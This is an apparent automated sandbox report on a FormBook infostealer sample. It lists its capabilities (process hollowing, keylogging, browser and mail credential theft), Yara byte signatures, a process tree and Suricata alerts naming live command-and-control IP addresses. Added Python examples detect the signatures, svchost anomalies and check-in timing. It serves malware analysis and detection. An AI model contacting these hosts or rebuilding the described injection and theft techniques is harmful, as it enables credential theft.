Windows Analysis Report
N2Qncau2rN.exe

Overview

General Information

Sample name: N2Qncau2rN.exe (renamed because original name is a hash value)
Original sample name: d649d0beff04be12fbad6cdb84d0f2460208309f845c890f0fa162a27d61051f.exe
Analysis ID: 1529035
MD5: 47d011ced9bd433871f605c662c06b55
SHA1: fd2e3100dcad95fd1fc6614a71ba0ac15bd3b05e
SHA256: d649d0beff04be12fbad6cdb84d0f2460208309f845c890f0fa162a27d61051f
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • N2Qncau2rN.exe (PID: 6404 cmdline: "C:\Users\user\Desktop\N2Qncau2rN.exe" MD5: 47D011CED9BD433871F605C662C06B55)
    • svchost.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\N2Qncau2rN.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • auuGcaPMTDojV.exe (PID: 7152 cmdline: "C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 4080 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • auuGcaPMTDojV.exe (PID: 1432 cmdline: "C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6424 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1409f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x16b09e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x15312d:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e423:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f223:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
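The Windows_Trojan_Formbook_1112e116 hits above quote two raw byte strings, $a2 and $a3, at a different offset in each dump. As an added example (editor's code, not the Yara rule or the report's own tooling), the Python below first scans a constructed buffer for both patterns and reports offsets the way a Yara string match does, and then reimplements what $a2 encodes: the editor's disassembly of those 20 bytes is a loop that skips N records of a length-prefixed table and leaves a pointer to the N-th payload, so the example walks such a table with the bounds checks the original code lacks. The buffer and table contents are constructed; the assumption that a flag-setting test on esi precedes the pattern is the editor's.

```python
"""Scan a buffer for the two Windows_Trojan_Formbook_1112e116 byte patterns quoted in
the report and walk the length-prefixed table that the $a2 code loop indexes.
Added example, not part of the Joe Sandbox report or of the Yara rule itself."""

# Hex strings exactly as the report quotes them for $a2 and $a3.
PATTERNS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}
PATTERN_BYTES = {name: bytes.fromhex(h) for name, h in PATTERNS.items()}


def find_all(buf: bytes, pat: bytes) -> list:
    """Every offset at which pat occurs in buf (overlapping hits included)."""
    hits, i = [], buf.find(pat)
    while i != -1:
        hits.append(i)
        i = buf.find(pat, i + 1)
    return hits


def scan(buf: bytes) -> dict:
    """Map each pattern name to its offsets, as a Yara string match would report them."""
    return {name: find_all(buf, pat) for name, pat in PATTERN_BYTES.items()}


# Editor's disassembly of $a2 (32-bit x86). The leading je consumes flags set by an
# instruction just before the pattern, assumed to be a test on esi (the index):
#   74 0A        je    +0x0A            ; index already 0 -> skip the loop
#   4E           dec   esi
#   0F B6 08     movzx ecx, byte [eax]  ; length byte of the current entry
#   8D 44 08 01  lea   eax, [eax+ecx+1] ; eax -> next entry
#   75 F6        jne   -0x0A            ; until esi entries have been skipped
#   8D 70 01     lea   esi, [eax+1]     ; esi -> payload of entry N
#   0F B6 00     movzx eax, byte [eax]  ; eax = payload length
#   8D 55 ..     lea   edx, [ebp+..]    ; cut off by the end of the pattern
# That is a lookup of entry N in a table of <length byte><payload> records.

def nth_entry(table: bytes, n: int) -> bytes:
    """Return the payload of entry n, following the same walk as the $a2 loop."""
    pos = 0
    for _ in range(n):
        if pos >= len(table):
            raise IndexError(f"table has fewer than {n + 1} entries")
        pos += 1 + table[pos]
    if pos >= len(table):
        raise IndexError(f"table has fewer than {n + 1} entries")
    length = table[pos]
    payload = table[pos + 1:pos + 1 + length]
    if len(payload) != length:
        raise ValueError(f"entry {n} truncated: declared {length}, have {len(payload)}")
    return payload


def build_table(entries) -> bytes:
    """Pack byte strings into the <len><payload> layout (helper for constructed data)."""
    out = bytearray()
    for e in entries:
        if len(e) > 0xFF:
            raise ValueError("entry longer than one length byte allows")
        out += bytes([len(e)]) + e
    return bytes(out)


# Constructed buffer: padding, $a2 at 0x20, padding, $a3 at 0x44.
SAMPLE = (b"\x90" * 0x20 + PATTERN_BYTES["$a2"]
          + b"\xCC" * 0x10 + PATTERN_BYTES["$a3"] + b"\x00" * 8)

if __name__ == "__main__":
    for name, offs in scan(SAMPLE).items():
        print(name, [hex(o) for o in offs])
    table = build_table([b"", b"kernel32.dll", b"ntdll.dll"])  # constructed
    print(nth_entry(table, 2))
```

The walk reads one length byte per entry and never validates that the payload fits in the buffer, which is why a scanner replaying it against an arbitrary dump needs the explicit IndexError and ValueError paths above.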

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\N2Qncau2rN.exe", CommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", ParentImage: C:\Users\user\Desktop\N2Qncau2rN.exe, ParentProcessId: 6404, ParentProcessName: N2Qncau2rN.exe, ProcessCommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", ProcessId: 6828, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\N2Qncau2rN.exe", CommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", ParentImage: C:\Users\user\Desktop\N2Qncau2rN.exe, ParentProcessId: 6404, ParentProcessName: N2Qncau2rN.exe, ProcessCommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", ProcessId: 6828, ProcessName: svchost.exe
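Both Sigma hits above fire on one fact already visible in the process tree: PID 6828 runs the SysWOW64 svchost.exe image, yet its command line is the sample's own path and its parent is the sample rather than services.exe, which is the footprint of a hollowed host process (consistent with the suspended-process, foreign-memory-write and thread-injection signatures and with the FormBook Yara hit on the unpacked PE at 0x400000 inside svchost.exe). As an added example (editor's code, not Joe Sandbox's or the Sigma rules' own logic), the Python below runs three checks of that kind over Sysmon-style process-creation records constructed from the report's values: image versus command-line executable mismatch, svchost.exe with a parent outside a small allowlist, and svchost.exe started without a -k service group. The allowlist, the benign baseline record and the sample's own parent (explorer.exe) are assumptions.

```python
"""Flag the process-creation pattern the report's Sigma hits describe: a SysWOW64
svchost.exe whose command line is the sample's path (image/command-line mismatch,
the footprint of a hollowed host) and an svchost.exe whose parent is not the SCM.
Added example; not Joe Sandbox's or the Sigma rules' own code."""
import ntpath

# Constructed Sysmon-style process-creation records. PIDs, images and command
# lines are copied from the report; the sample's own parent (explorer.exe) is assumed.
EVENTS = [
    {"ProcessId": 6404, "Image": r"C:\Users\user\Desktop\N2Qncau2rN.exe",
     "CommandLine": r'"C:\Users\user\Desktop\N2Qncau2rN.exe"',
     "ParentProcessId": 1000, "ParentImage": r"C:\Windows\explorer.exe"},  # parent assumed
    {"ProcessId": 6828, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\N2Qncau2rN.exe"',
     "ParentProcessId": 6404, "ParentImage": r"C:\Users\user\Desktop\N2Qncau2rN.exe"},
    # Benign baseline (constructed): a service host started by services.exe with -k.
    {"ProcessId": 900, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentProcessId": 700, "ParentImage": r"C:\Windows\System32\services.exe"},
]

# Parents from which svchost.exe normally starts. Illustrative subset (assumption);
# the Sigma rule "Uncommon Svchost Parent Process" carries its own, longer allowlist.
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe"}


def first_token(cmdline: str) -> str:
    """Executable part of a Windows command line, honouring a leading quoted path."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def analyze(event: dict) -> list:
    """Return the list of findings for one process-creation record."""
    findings = []
    image = basename(event["Image"])
    claimed = basename(first_token(event["CommandLine"]))
    if claimed and claimed != image:
        findings.append(f"image/command-line mismatch: image={image}, command line names {claimed}")
    if image == "svchost.exe":
        parent = basename(event.get("ParentImage", ""))
        if parent not in SVCHOST_PARENTS:
            findings.append(f"uncommon svchost parent: {parent or 'unknown'}")
        if " -k " not in event["CommandLine"].lower() + " ":
            findings.append("svchost.exe started without a -k service group")
    return findings


def scan(events) -> dict:
    """Map ProcessId -> findings for every record that produced at least one."""
    result = {}
    for e in events:
        findings = analyze(e)
        if findings:
            result[e["ProcessId"]] = findings
    return result


if __name__ == "__main__":
    for pid, findings in scan(EVENTS).items():
        for f in findings:
            print(f"PID {pid}: {f}")
```

The mismatch check is the most portable of the three: a hollowed process inherits the command line passed to CreateProcess by the injector, so whenever the injector reuses its own path (as here) the image name and the command-line executable disagree regardless of which host binary was chosen.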
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T15:33:37.818114+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60549 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:01.420541+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60575 | 74.208.236.25 | 80 | TCP
2024-10-08T15:34:14.561340+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60657 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:28.651115+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60728 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:43.504908+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60821 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:56.674011+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60835 | 3.33.130.190 | 80 | TCP
2024-10-08T15:35:15.289129+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60839 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:29.515917+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60843 | 208.91.197.27 | 80 | TCP
2024-10-08T15:36:04.387734+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60847 | 156.242.132.82 | 80 | TCP
2024-10-08T15:36:25.860953+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60851 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:39.447772+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60855 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:52.998866+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60859 | 195.161.68.8 | 80 | TCP
2024-10-08T15:37:06.473050+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60863 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:20.988426+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60867 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:35.160910+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 60871 | 154.23.184.240 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T15:33:37.818114+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60549 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:01.420541+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60575 | 74.208.236.25 | 80 | TCP
2024-10-08T15:34:14.561340+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60657 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:28.651115+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60728 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:43.504908+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60821 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:56.674011+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60835 | 3.33.130.190 | 80 | TCP
2024-10-08T15:35:15.289129+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60839 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:29.515917+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60843 | 208.91.197.27 | 80 | TCP
2024-10-08T15:36:04.387734+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60847 | 156.242.132.82 | 80 | TCP
2024-10-08T15:36:25.860953+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60851 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:39.447772+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60855 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:52.998866+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60859 | 195.161.68.8 | 80 | TCP
2024-10-08T15:37:06.473050+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60863 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:20.988426+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60867 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:35.160910+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 60871 | 154.23.184.240 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T15:33:53.420266+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60551 | 74.208.236.25 | 80 | TCP
2024-10-08T15:33:55.974521+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60552 | 74.208.236.25 | 80 | TCP
2024-10-08T15:33:58.518622+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60559 | 74.208.236.25 | 80 | TCP
2024-10-08T15:34:07.984460+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60611 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:10.398319+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60627 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:12.054678+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60641 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:21.140669+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60679 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:23.564525+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60698 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:25.192247+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60715 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:36.000173+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60775 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:38.444808+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60788 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:41.093787+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60807 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:49.003817+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60832 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:51.548045+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60833 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:54.114725+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60834 | 3.33.130.190 | 80 | TCP
2024-10-08T15:35:07.426657+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60836 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:10.238944+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60837 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:12.826861+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60838 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:21.277375+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60840 | 208.91.197.27 | 80 | TCP
2024-10-08T15:35:23.849037+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60841 | 208.91.197.27 | 80 | TCP
2024-10-08T15:35:26.372438+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60842 | 208.91.197.27 | 80 | TCP
2024-10-08T15:35:36.363602+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60844 | 156.242.132.82 | 80 | TCP
2024-10-08T15:35:39.453234+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60845 | 156.242.132.82 | 80 | TCP
2024-10-08T15:35:42.000108+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60846 | 156.242.132.82 | 80 | TCP
2024-10-08T15:36:18.221807+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60848 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:20.739145+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60849 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:23.290927+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60850 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:31.833598+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60852 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:34.378358+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60853 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:36.958949+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60854 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:45.350125+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60856 | 195.161.68.8 | 80 | TCP
2024-10-08T15:36:47.872321+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60857 | 195.161.68.8 | 80 | TCP
2024-10-08T15:36:50.434708+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60858 | 195.161.68.8 | 80 | TCP
2024-10-08T15:36:58.822777+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60860 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:01.358985+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60861 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:03.925498+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60862 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:12.998557+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60864 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:15.516621+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60865 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:18.064555+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60866 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:27.559782+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60868 | 154.23.184.240 | 80 | TCP
2024-10-08T15:37:30.080815+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60869 | 154.23.184.240 | 80 | TCP
2024-10-08T15:37:32.875337+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 60870 | 154.23.184.240 | 80 | TCP
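Read together, the three tables above show FormBook's check-in cadence: for each host, three POST check-ins (SID 2855464) about 2.5 s apart, then a GET check-in (SIDs 2050745 and 2855465 on the same connection) about 3 s later, then a move to the next host roughly 13 to 15 s after the previous round began; the same IP (3.33.130.190) recurs in several separate rounds because several entries of the bot's host list resolve to it. As an added example (editor's code, not Joe Sandbox output or Suricata configuration), the Python below builds Suricata EVE JSON alert records from the first three rounds in the tables, groups them into per-host rounds, flags the rounds that match the three-POST-then-GET shape, and measures the rotation period as a hunting feature. The EVE field names follow Suricata's alert output; the 5-second intra-round gap threshold is an assumption tuned to these timings.

```python
"""Group Suricata EVE alerts into FormBook check-in rounds (three POST check-ins to one
host, then a GET, then the next host) and measure the host-rotation period.
Added example, not Joe Sandbox output; the records below are constructed from the
timestamps, ports and hosts in the report's alert tables."""
import json
from datetime import datetime

POST_SID = 2855464             # ETPRO MALWARE FormBook CnC Checkin (POST) M3
GET_SIDS = {2050745, 2855465}  # ET / ETPRO MALWARE FormBook CnC Checkin (GET) M5 / M2

# (timestamp, source port, destination host, signature id), copied from the report.
_RAW = [
    ("2024-10-08T15:33:53.420266+0200", 60551, "74.208.236.25", 2855464),
    ("2024-10-08T15:33:55.974521+0200", 60552, "74.208.236.25", 2855464),
    ("2024-10-08T15:33:58.518622+0200", 60559, "74.208.236.25", 2855464),
    ("2024-10-08T15:34:01.420541+0200", 60575, "74.208.236.25", 2050745),
    ("2024-10-08T15:34:01.420541+0200", 60575, "74.208.236.25", 2855465),
    ("2024-10-08T15:34:07.984460+0200", 60611, "3.33.130.190", 2855464),
    ("2024-10-08T15:34:10.398319+0200", 60627, "3.33.130.190", 2855464),
    ("2024-10-08T15:34:12.054678+0200", 60641, "3.33.130.190", 2855464),
    ("2024-10-08T15:34:14.561340+0200", 60657, "3.33.130.190", 2050745),
    ("2024-10-08T15:34:14.561340+0200", 60657, "3.33.130.190", 2855465),
    ("2024-10-08T15:34:21.140669+0200", 60679, "3.33.130.190", 2855464),
    ("2024-10-08T15:34:23.564525+0200", 60698, "3.33.130.190", 2855464),
    ("2024-10-08T15:34:25.192247+0200", 60715, "3.33.130.190", 2855464),
    ("2024-10-08T15:34:28.651115+0200", 60728, "3.33.130.190", 2050745),
    ("2024-10-08T15:34:28.651115+0200", 60728, "3.33.130.190", 2855465),
]
# Constructed EVE alert lines in Suricata's field layout.
EVE_LINES = [json.dumps({
    "timestamp": ts, "event_type": "alert", "src_ip": "192.168.2.9", "src_port": sp,
    "dest_ip": dst, "dest_port": 80, "proto": "TCP",
    "alert": {"signature_id": sid, "severity": 1}}) for ts, sp, dst, sid in _RAW]
# One non-alert record, to show that other EVE event types are ignored.
EVE_LINES.insert(4, json.dumps({"timestamp": "2024-10-08T15:34:00.000000+0200",
                                "event_type": "flow", "dest_ip": "74.208.236.25"}))


def parse_alerts(lines):
    """Keep only alert records; return them sorted by time."""
    alerts = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("event_type") != "alert":
            continue
        alerts.append({
            "ts": datetime.strptime(rec["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": rec["alert"]["signature_id"],
            "dest": rec["dest_ip"],
            "sport": rec["src_port"],
        })
    return sorted(alerts, key=lambda a: a["ts"])


def checkin_rounds(alerts, max_gap=5.0):
    """Split the alert stream into rounds: consecutive alerts to the same host with at
    most max_gap seconds between them. One host may appear in several rounds."""
    rounds = []
    for a in alerts:
        cur = rounds[-1] if rounds else None
        if cur and cur["dest"] == a["dest"] and (a["ts"] - cur["last"]).total_seconds() <= max_gap:
            cur["last"] = a["ts"]
            cur["sids"].append(a["sid"])
        else:
            rounds.append({"dest": a["dest"], "first": a["ts"], "last": a["ts"], "sids": [a["sid"]]})
    return rounds


def is_formbook_round(r):
    """At least three POST check-ins, all of them before the first GET check-in."""
    posts = [i for i, s in enumerate(r["sids"]) if s == POST_SID]
    gets = [i for i, s in enumerate(r["sids"]) if s in GET_SIDS]
    return len(posts) >= 3 and bool(gets) and max(posts) < min(gets)


def detect(lines, max_gap=5.0):
    return [r for r in checkin_rounds(parse_alerts(lines), max_gap) if is_formbook_round(r)]


def rotation_gaps(rounds):
    """Seconds from the start of one round to the start of the next."""
    return [(b["first"] - a["first"]).total_seconds() for a, b in zip(rounds, rounds[1:])]


if __name__ == "__main__":
    found = detect(EVE_LINES)
    for r in found:
        print(f'{r["dest"]:15} {r["first"].time()} -> {r["last"].time()} sids={r["sids"]}')
    print("rotation period (s):", [round(g, 1) for g in rotation_gaps(found)])
```

Grouping on destination IP alone would merge the two consecutive 3.33.130.190 rounds into one; the time gap is what keeps them apart, which is why the threshold sits between the longest intra-round gap (about 3 s) and the shortest inter-round gap (about 6.5 s) seen in the tables.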

            AV Detection

